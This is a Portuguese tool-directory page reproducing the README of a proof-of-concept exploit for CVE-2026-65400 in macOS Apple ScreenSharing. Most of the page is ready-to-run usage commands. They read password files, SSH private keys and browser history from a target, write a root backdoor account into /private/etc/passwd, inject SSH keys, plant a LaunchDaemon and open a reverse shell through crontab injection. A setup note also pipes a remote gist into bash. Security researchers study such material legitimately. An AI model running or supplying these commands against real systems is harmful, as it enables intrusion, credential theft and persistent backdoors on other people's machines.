Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-65400 — Exploit de prova de conceito para CVE-2026-65400 que permite leitura/escrita autenticada de arquivos, shells reversas e persistência no macOS via Apple ScreenSharing. | Kitploit
Ferramentas/GitHubGitHub/horkimhab/cve-2026-65400
Escalada de PrivilégiosMecanismos de PersistênciaExploraçãoPós-ExploraçãoAutenticaçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Exploit de prova de conceito para CVE-2026-65400 que permite leitura/escrita autenticada de arquivos, shells reversas e persistência no macOS via Apple ScreenSharing.

Ver Repositório
3110há 24 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2026-65400

Doar

Apoie a manutenção deste projeto com PayPal ou escaneando o código QR abaixo.

paypal

Código QR para doação

⚡ Uso Simples

Use este projeto apenas em ambientes seguros e autorizados, como:

  • Máquinas virtuais locais
  • Contêineres Docker
  • Ambientes de laboratório isolados
  • Ambientes de teste de penetração autorizados

Exemplo de configuração:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Exemplo de uso:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Nota:

  • ao clonar de outro projeto, você deve executar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpar o diretório .git aninhado
  • ex.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito ou Referência

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Repositório Educacional de Pesquisa em Segurança

Um repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.


⚠️ Aviso Legal e de Segurança

Propósito

Este repositório é apenas para pesquisa educacional e autorizada em segurança.

Ele foi projetado para ajudar os usuários a aprender sobre:

  • Vulnerabilidades de segurança
  • Conceitos de sandbox e isolamento
  • Práticas de codificação segura e defesa

Uso Somente Autorizado

Use este repositório apenas em ambientes onde você tenha permissão, como:

  • Laboratórios pessoais ou máquinas virtuais
  • Ambientes Docker ou isolados
  • Testes de penetração autorizados
  • Treinamento em segurança cibernética ou pesquisa acadêmica

O uso não autorizado ou ilegal é estritamente proibido.


Sem Responsabilidade

O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causadas por este projeto.

Ao usar este repositório, você concorda que:

  • Você é responsável pelas suas próprias ações
  • Você o usará de forma legal e ética
  • O projeto é fornecido sem garantia

Uso Ético

Este projeto destina-se a:

  • Pesquisa de segurança defensiva
  • Educação em segurança cibernética
  • Conscientização sobre vulnerabilidades
  • Pesquisa segura de sistemas e software

Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.


Contato

Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.


Projeto Relacionado

Explore a Coleção de PoC CVE para obter recursos adicionais de prova de conceito de CVE destinados a pesquisa e educação autorizadas em segurança.

Baixar ferramenta